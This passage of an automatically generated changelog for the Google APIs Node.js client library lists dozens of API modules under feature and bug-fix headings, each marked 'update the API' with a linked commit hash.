([8b4c314](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b4c31451d3ace85c48b8a1170eac09024c518e0))
- **analyticshub:** update the API
([d06ce46](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d06ce46d020c92976660e2e9ee68f35f0e2da2f6))
- **androidmanagement:** update the API
([bb2dc2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb2dc2d1e3d99b2a27bfe9f1b517ab257cc886bf))
- **androidpublisher:** update the API
([f58a3c8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f58a3c8544b91d6cb987f2b72f200e7b79eabe14))
- **appengine:** update the API
([543b45e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/543b45e8cad0556e923f2f44e61d3bf96675e1ca))
- **apphub:** update the API
([e9a8db0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e9a8db0b264dc78e526dae22ff7a33574406a360))
- **artifactregistry:** update the API
([5a5e4aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a5e4aae48f826b6daec0493c4cfe79b4b0dfa4a))
- **authorizedbuyersmarketplace:** update the API
([351c7ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/351c7edca745cf8d996963e6816811eaaca09a04))
- **backupdr:** update the API
([9796834](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/97968343e02bd85538961138f02ed20976f53a02))
- **beyondcorp:** update the API
([7f20c02](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f20c0238728cae35a37e06b95e7dbb8cad57e2e))
- **bigqueryconnection:** update the API
([0e56135](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e56135413c3799c0543bb45510dede96970cb63))
- **bigquery:** update the API
([72b5d21](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/72b5d21ed11f1bcde638a1240c02d6ce03906844))
- **bigtableadmin:** update the API
([ad68d8c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad68d8c6e175573ebd5c54ec74328386d9dc8cd3))
- **blockchainnodeengine:** update the API
([7f0503c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f0503cc2cf3b7d7f90f0518a1deb592a4f313a4))
- **chat:** update the API
([0810516](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/081051658a22c7bf2cd8915838608f53fb620cd6))
- **cloudasset:** update the API
([4eb45be](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4eb45bed03811fb3f5c18967a0c7128ced2ee011))
- **cloudbuild:** update the API
([d20db7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d20db7be93195c69e6b1345bcf196aeab8b57b35))
- **clouddeploy:** update the API
([cd5014b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd5014bd87adbfbc2729f78f7d56bb4b8d42b7d7))
- **cloudsupport:** update the API
([ceb5503](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ceb5503e69b26a0838d8decc00ca17ebdcdda743))
- **compute:** update the API
([f84e98a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f84e98a33f39034e2cb7846fbc4c3fc6804a2ffa))
- **connectors:** update the API
([478d8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/478d8c60beb0ccae9a89590f71802aa7843275e2))
- **contactcenteraiplatform:** update the API
([862d69b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/862d69b84cbbe5f9e6c34af4bfdfbe33990c9331))
- **contactcenterinsights:** update the API
([c1974c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c1974c4b7385c84fdb70cd3c05e5ad601dbb4272))
- **container:** update the API
([8cd9863](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8cd986326583b69735627bae07263fad1595b7fb))
- **content:** update the API
([76546b8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76546b866ac0e675f27b2b9ab1727f4c821c17ac))
- **contentwarehouse:** update the API
([aa28685](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aa286853fecaa5d45d80e33e309ea388ea6ece97))
- **dataflow:** update the API
([ddd9231](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddd92315d9fff4a5a20493b1ce874f0974df3b82))
- **dataform:** update the API
([a43ddce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a43ddced989c08697f803f6d167f771ae27ecbcb))
- **datamigration:** update the API
([f0e692d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f0e692d9169793bc8abe3cd33982e36e04faf3ea))
- **dataplex:** update the API
([20e701c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/20e701c6dc51978418c70f58907d0d2c8d5d407d))
- **dataportability:** update the API
([50c5d63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50c5d63f83ccf4e91e27e7322062a8edc24b33cf))
- **datastream:** update the API
([57a62ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57a62ef7920ab1ca1e18452b2749c3585a981736))
- **dialogflow:** update the API
([ddfc789](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddfc789b5c0c567d2ddc8241448e260bfb7ad20f))
- **discoveryengine:** update the API
([ec40fe5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec40fe54ac9bc032c370f8eaf436489a10b04159))
- **discovery:** update the API
([8d42dab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8d42dab88214bc01e9a9678794b6015435b5071f))
- **displayvideo:** update the API
([90937cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90937cda7d6475fd0f04ac2332f3351f53f08b22))
- **dlp:** update the API
([88f0a64](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f0a640104e95f5aa785b89658997746153915e))
- **dns:** update the API
([4688a5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4688a5ef2114c8ffcc15890ee47949431915841c))
- **documentai:** update the API
([b07b1aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b07b1aa83a3be53769729f43afe252bab824b55a))
- **domains:** update the API
([d34c2a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d34c2a09071ea3431f88ce0b6be0757a9682f66e))
- **doubleclickbidmanager:** update the API
([0e6990d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e6990d73d7c576483a84b4dce75a5fd7fe3c0ad))
- **eventarc:** update the API
([0c28816](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c2881683796bfbc7581c2b772ef6d630737ad02))
- **factchecktools:** update the API
([bd8d187](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd8d187f2fa9859b230c0292c509312b93fba7a5))
- **firestore:** update the API
([6d67fed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6d67fed98433e01900db319bc4747577cb6d6e3d))
- **games:** update the API
([99d63c1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99d63c1ce9e7a141ce34ca9ab3b85e7c24413357))
- **gkebackup:** update the API
([e90fb98](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e90fb98d64548538cbb810258e9fde7b3f3561fc))
- **gkehub:** update the API
([d4c3244](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d4c3244d232a2788ef39e85a3ba451227446ebb2))
- **gmail:** update the API
([a4d9319](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a4d9319ad50bbfd9e27ed7b4ff865951b7dd1032))
- **iam:** update the API
([2e9117f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2e9117f73657e08bcea4de889f49bbeca4cb6882))
- **iap:** update the API
([db72cb3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72cb3acc75efc17df7dd0d6b4418e17c1c3c81))
- **logging:** update the API
([4317a72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4317a72ef5752de222fafdaadb4be75267fedd4f))
- **marketingplatformadmin:** update the API
([ff87055](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ff8705570be84e5c2b93bac53dc6dc38923137ef))
- **metastore:** update the API
([57b1763](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57b1763cd49724b461a5f85f8a6ef1cdebfdd500))
- **migrationcenter:** update the API
([3f91b3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3f91b3abc6c81c7848e127563207299631cb1c7c))
- **monitoring:** update the API
([b601933](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6019332629f7f487a720bbedf58284f32bc84f2))
- **networkconnectivity:** update the API
([bb6e8ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb6e8ffe0ccc87c117b7acbecf2ad9a52ec76158))
- **networkmanagement:** update the API
([3c9d201](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c9d20120e16a1c6df1c2cbac758d2fa28670c7b))
- **ondemandscanning:** update the API
([9efea7e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9efea7ec8fa03709a875f4e8131bcdf059ddd403))
- **orgpolicy:** update the API
([9abcb3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9abcb3ab05e3f8ceac3d5f6fb77b69b6312d3d78))
- **paymentsresellersubscription:** update the API
([5c6228e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c6228e8693db8d5c3797148f0f547063beb23f1))
- **privateca:** update the API
([c8bed74](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c8bed74402e19d48227929a3c387663650c713fd))
- **pubsub:** update the API
([985ba9b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/985ba9bb35f3bd9db382497be3ec99d4c309cff4))
- **recaptchaenterprise:** update the API
([cd6af58](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd6af586c85f638a9e59647f9e14e13fbf4500c4))
- **redis:** update the API
([2896261](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/28962616def25002b1ab7eb995f220ba87646894))
- regenerate index files
([7cbd403](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cbd403f5f44d43aa9fb86f35b4b71ff16bf8511))
- **retail:** update the API
([5c3af10](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c3af10dc0c01bcba9ac1dd306ece2641e576f66))
- **run:** update the API
([4adbdec](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4adbdec9d3771f3c024f978fab7897e547825b11))
- **searchads360:** update the API
([03ca122](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/03ca122fba8a0ae1bf3cb482aefefd17eeba6adf))
- **securitycenter:** update the API
([8b08aa2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b08aa2ac1d8bb8eb264f8bda3089da60b4f4028))
- **serviceconsumermanagement:** update the API
([8878e94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8878e945849f0c8a2946789f554aa8f7d43d9db5))
- **servicecontrol:** update the API
([763243a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/763243a5a56fbc735a259bc8a0cd16046a9b5289))
- **servicenetworking:** update the API
([d481dce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d481dce95d7f9f899d9b62f78933a731159f381c))
- **serviceusage:** update the API
([41b76ee](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/41b76ee8d6beeeb3bbccdcbbcd0853f610a54171))
- **sheets:** update the API
([74b2d05](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74b2d057117112b9b6991f70dc47ac60a9945e82))
- **spanner:** update the API
([2d2e0f6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d2e0f64b7ceb23e7695939c367d74c7ce14fc2b))
- **sqladmin:** update the API
([7cc6d5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cc6d5e1283e44228e54acf2bdb10bbe5436996c))
- **tpu:** update the API
([d6658ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d6658ff0af9efce119b420c5da8cfcab7b882276))
- **trafficdirector:** update the API
([69f9252](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/69f92522ff9920b35c5a07302f509f86c49485df))
- **verifiedaccess:** update the API
([33544fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/33544fca5d8da32c49b7c9a803e6f818cd71abcb))
- **workloadmanager:** update the API
([855fab4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/855fab42662185d828978f3474b6eba492f4b674))
- **workstations:** update the API
([867515f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/867515ff691803da59aac961866bb6afb224a642))
- **youtube:** update the API
([7452149](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7452149d3d70dd45b10ceff77310aa09b6c2c57d))

##### Bug Fixes

- **abusiveexperiencereport:** update the API
([dfd4aa1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dfd4aa1e515b9665f2fcdf4a13eecd267b386895))
- **acceleratedmobilepageurl:** update the API
([9b0387c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9b0387c44997aab7f305900eee6fcb8801d3f7ee))
- **accesscontextmanager:** update the API
([413c833](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/413c833b3273a224f9df5fc36fae40669724e4fb))
- **acmedns:** update the API
([4199c73](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4199c734fcde97cd00126d4531c0acfe7f4aad9a))
- **addressvalidation:** update the API
([3c51f3f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c51f3f5214e6465f25825ee8f37a773bbc7b07e))
- **adexchangebuyer2:** update the API
([ec9384a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec9384ab02f3f30493962122c90c0549c318c7d4))
- **adexperiencereport:** update the API
([8932647](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8932647c6be056c97fff0754cf4198ae9b55e6bd))
- **admob:** update the API
([7b699f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b699f5f9cc2f565811caf67a944eaa104d22efb))
- **adsensehost:** update the API
([e4373ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e4373ed0b695c995317e6f735542a228df2022e7))
- **analyticsdata:** update the API
([9c8dcf8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c8dcf8f9aae5858d453a0dae64ca9837672bc87))
- **analyticsreporting:** update the API
([4b2a5bd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4b2a5bdaf8aca2a581fec1e7ee1f534eb9867dca))
- **analytics:** update the API
([f7f9cc4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f7f9cc4b9f2bf47aedd233ecdfb43531b5dad3cd))
- **androiddeviceprovisioning:** update the API
([47d89cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/47d89cda619cdec6b83e826913e1ff92e090ced8))
- **androidenterprise:** update the API
([293c247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/293c247fbf83fbe9b54c14cd991b69bfd9679996))
- **apigateway:** update the API
([7d02f2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7d02f2dae2c63f6cf62de73fc1d3e1381f9f7ce1))
- **apigeeregistry:** update the API
([f627870](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f62787095c2439b882896130c259cedb810114de))
- **apikeys:** update the API
([f2ab501](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f2ab50102415317c56bb20fb7c1894505c86a7e9))
- **area120tables:** update the API
([ba9d3e6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ba9d3e6258f47ea0d0bb3dae9f484a9097f2bdad))
- **assuredworkloads:** update the API
([3dc3798](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3dc3798f56c03f0cf7136eb5d5e625ef2c3c21ee))
- **batch:** update the API
([10727a4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10727a4ccab11bd1203fa95cb14131a67804e7a5))
- **biglake:** update the API
([ebfd8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ebfd8c6610f83f7ed63d21705f7d1eb2ed6db2d0))
- **bigquerydatapolicy:** update the API
([4871975](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/48719750b35826c4f147f8dc8601c90188dc8bee))
- **bigquerydatatransfer:** update the API
([05b9fc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/05b9fc89e9f0b1b94092e50cef21b03044b836ba))
- **bigqueryreservation:** update the API
([9f226a3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9f226a3de413175cd44c76f45b19169010daaaa9))
- **billingbudgets:** update the API
([1190847](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1190847e882070097b0ef0fc74f23c5f162ecd16))
- **binaryauthorization:** update the API
([a5ad874](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a5ad874a862e827b55278bd56f25d6efbcc797c6))
- **blogger:** update the API
([285aa94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/285aa9455d6afe92001fa4373c7a153124d9bf21))
- **books:** update the API
([b95f9af](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b95f9aff24842b3e2132f74913fb794699ea55be))
- **businessprofileperformance:** update the API
([92abfea](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/92abfea3a06b9714b650f6846469a434ff9d8c71))
- **calendar:** update the API
([a040e6d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a040e6d6ccbb5efbebd09db5e452e586072afc71))
- **certificatemanager:** update the API
([32dd53e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/32dd53e849a341afbd7f0f52548485167556f85d))
- **checks:** update the API
([37cb793](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/37cb793b61fbf605d4e94af20abbe6a75fab277d))
- **chromemanagement:** update the API
([2a9f611](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a9f611d836a86cb36e0288ee13818238fac9a02))
- **chromepolicy:** update the API
([5f2b01b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f2b01b222e12e7719296d6dbc885aa8b029c47b))
- **chromeuxreport:** update the API
([c7af220](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c7af220ffb1f7c5ee56a7e6ad0a87d9ff4c0e8a1))
- **civicinfo:** update the API
([74c8d7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74c8d7be47d07654832eca7a82ff54ab727e556a))
- **classroom:** update the API
([2183745](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2183745a478778c1009d91ab160f1546526c7746))
- **cloudbilling:** update the API
([f8baaac](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f8baaac306d170b837cf2eb544edae932d13ed98))
- **cloudchannel:** update the API
([a65c068](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a65c068d0595e90214d69be0ab74af66c80ad62d))
- **cloudcontrolspartner:** update the API
([5a7437b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a7437badd218eb3b92544397baa440040d2f3a6))
- **clouderrorreporting:** update the API
([4c557f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4c557f5a186799c1f4abe3b7afa3b1481f187b14))
- **cloudfunctions:** update the API
([fc21faf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc21faf20d3f7a4a70c035cea20fc36082a247b9))
- **cloudidentity:** update the API
([3d288c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d288c674958a8ece72b1bb73764b9549b3cbc1c))
- **cloudkms:** update the API
([93e0687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/93e06878abf84ad8b1df3f12ace0f067b1f25098))
- **cloudprofiler:** update the API
([d11e9e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d11e9e41137ae8d062bd4ed084a350b0bde8d3c0))
- **cloudresourcemanager:** update the API
([76f0f51](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76f0f511f97312e3aa7a41f14befa836ce44df55))
- **cloudscheduler:** update the API
([94305b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/94305b7da4ccfab0e63b613d6a7fcbe33864270d))
- **cloudsearch:** update the API
([e6de73d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e6de73da3a7cf1c269ef6017843ccf6fd078f154))
- **cloudshell:** update the API
([f399b75](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f399b75d0d63674a28970f589aea6f01eab1577b))
- **cloudtasks:** update the API
([31dbbe2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31dbbe2439fabe0f0fc1b8f3377a305fee87c2c0))
- **cloudtrace:** update the API
([212d697](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/212d697a0e2654ba1bb8f2775bf039b57be3a6cd))
- **composer:** update the API
([75304a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/75304a070d61822ec87af425147acf2a3e72afdf))
- **config:** update the API
([07be765](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/07be7657dd18a230d4e2390f156263a98fdae02a))
- **containeranalysis:** update the API
([90afb7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90afb7bddfde862f89ed2f599ca74bf8e2002e8c))
- **customsearch:** update the API
([dc6b156](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dc6b156aaa9bcb1d45356db3c3a7058ed0720c04))
- **datacatalog:** update the API
([64c1abc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/64c1abc7e78bbe9a213c1c696a83389ca1b8d313))
- **datafusion:** update the API
([6aff1d8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6aff1d8ecad16691a2b9d5ab4b5bfacf2680c8a0))
- **datalabeling:** update the API
([797471f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/797471fb5f97302a1ab7f50587298aee650bf372))
- **datapipelines:** update the API
([e108596](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e10859679756d3c1fe243ade7b4ff096d4057f7a))
- **dataproc:** update the API
([abbcb61](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abbcb618952a5c365ef553b83f88bd4fc6a19c68))
- **datastore:** update the API
([fe99c43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe99c436b00f3e0db1c048b6e1978c2c91eeaf75))
- **deploymentmanager:** update the API
([87fda2a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87fda2a3b88f81077ed5f18f52e0263644ba19cb))
- **dfareporting:** update the API
([4cec666](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4cec666a18587527e4973548112080ccafaa9e37))
- **digitalassetlinks:** update the API
([abe8c25](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abe8c25a24e1c1e521338d1ece3f8124c08ed686))
- **docs:** update the API
([5c28cc5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c28cc5f90c3ec07902952673a54a9439aebaefe))
- **domainsrdap:** update the API
([f3678df](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f3678df1b0f9621c9319be5c32b5c1ae0257409f))
- **doubleclicksearch:** update the API
([f6e9c9a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f6e9c9a07c6871be0b722532e09a1079fa2aa84d))
- **driveactivity:** update the API
([63563b6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/63563b6d89ccdb8a778089c48a649d212ae41187))
- **drivelabels:** update the API
([44db39e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/44db39ea335d5b3566c1f6a751f32eb159427c6a))
- **drive:** update the API
([5f88b3e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f88b3e4deaa2aa30bc78df0e5c2e9e387e7d161))
- **essentialcontacts:** update the API
([6bc249f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6bc249f5d12c4975f3569ad735fe6b14875960a7))
- **fcmdata:** update the API
([da072ae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/da072ae63e796156028c0b28863adfef9d1887b8))
- **fcm:** update the API
([c2043ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2043ed711270a5e38a0842b539898e9d289f436))
- **file:** update the API
([4bbf0b9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4bbf0b92661f5ea47f09eefecf48238ab13980f1))
- **firebaseappcheck:** update the API
([851d463](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/851d4639bf75850c4ab88c1dad4dfd9166f9801b))
- **firebaseappdistribution:** update the API
([96163b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/96163b73f732144c3da840b18d6a55aac62d6081))
- **firebasedatabase:** update the API
([3d96170](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d96170cc795827c84a53e0c3d0de526a12b9d95))
- **firebasedynamiclinks:** update the API
([1122f63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1122f63e79402abe5be53a38334c565ca883ad18))
- **firebasehosting:** update the API
([6abce84](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6abce84cf7567d906dc94c64700c8bc42c55de4a))
- **firebaseml:** update the API
([eef0dfe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/eef0dfe82ab1c082959cdb168d9c8e438b98606b))
- **firebaserules:** update the API
([d02b49c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d02b49c84908b0757a6525665b9451092c0ee3dd))
- **firebasestorage:** update the API
([b303956](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b303956d395587471344b89bf546068d89b6b1a8))
- **firebase:** update the API
([38f0247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/38f024730891a3e566ac49a18dd2786768f8fe10))
- **fitness:** update the API
([bd72df1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd72df18aba9c830b788a5ac4fd260ba693ce31d))
- **forms:** update the API
([e06cd96](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e06cd96538ce8a44d850c8cc29aabcdf0b180ab9))
- **gamesConfiguration:** update the API
([b26b164](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b26b16406b25d2cc66aeb21bbb4eb7d366c4f6ac))
- **gamesManagement:** update the API
([c056dbb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c056dbb47b86bf807f7a536281f4ec9f715b1b3b))
- **gkeonprem:** update the API
([50b340a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b340ab8c56308486f8f47f15cf76c010300137))
- **gmailpostmastertools:** update the API
([2d1dd45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d1dd456fd959314d4dfdd5066f32304ca6534a4))
- **groupsmigration:** update the API
([2d5dfc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d5dfc87a79567d6c65713279d9e169f791edd15))
- **groupssettings:** update the API
([81f7c45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/81f7c4560d45065ccd96c24d05094c7b5de59580))
- **healthcare:** update the API
([4dcb153](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4dcb1532b818deed3e14b43d2e42de87d68a71ab))
- **homegraph:** update the API
([709f585](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/709f58538c74d97ac0508b3d5fd6518502401614))
- **iamcredentials:** update the API
([0610412](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/06104128540bdc9565a0cd8cdb812aafe4025ba2))
- **identitytoolkit:** update the API
([99534fb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99534fba8b394219448155ab565154cfa5710b15))
- **ids:** update the API
([5ad0d0b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5ad0d0ba7b827d5b24e69baa8ec6fb6aff738d2f))
- **indexing:** update the API
([3c4e15a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c4e15a098c8cfaa8ac116046553bac0ca1cd7cb))
- **jobs:** update the API
([7687e7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7687e7b88acbf1c0803bb9490593839728e013e5))
- **kgsearch:** update the API
([5a54be2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a54be26f5328c9a0b167cc06e4026358e1970df))
- **kmsinventory:** update the API
([3ac181b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3ac181bbd6283099b1ea29b1371c61eb0e211773))
- **language:** update the API
([91caf34](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/91caf3471150689b54fa2a51cde93de44c595df7))
- **libraryagent:** update the API
([50b72ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b72ef609e5c9058b5a03ed5aaa1b5062e4bf47))
- **licensing:** update the API
([b6f27e9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6f27e942a89e4597e1c212a700b26f51ddb7bf9))
- **lifesciences:** update the API
([fcc9aae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcc9aaec76f6e1075e520b75118a9ca77a596dfb))
- **localservices:** update the API
([ca0c8d7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ca0c8d7c7409cccbdf436d539119f093d3f62eec))
- **looker:** update the API
([0c067fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c067fa5944b446b3b6766b57aec7ab646f08ba1))
- **managedidentities:** update the API
([1f430c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1f430c5ffd6aa522f4d99978a3a719918295a231))
- **manufacturers:** update the API
([d55ac4f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d55ac4f151d006e4d975eede60e491877a706a93))
- **memcache:** update the API
([39c011c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/39c011c3681af3e906b370080a2ca8a6caf83fa0))
- **ml:** update the API
([bf42196](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bf421969326b70fae5d4c6cddc432546004ec0f0))
- **mybusinessaccountmanagement:** update the API
([ce386e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ce386e47e08737a2252203bc30d39229d9be595a))
- **mybusinessbusinessinformation:** update the API
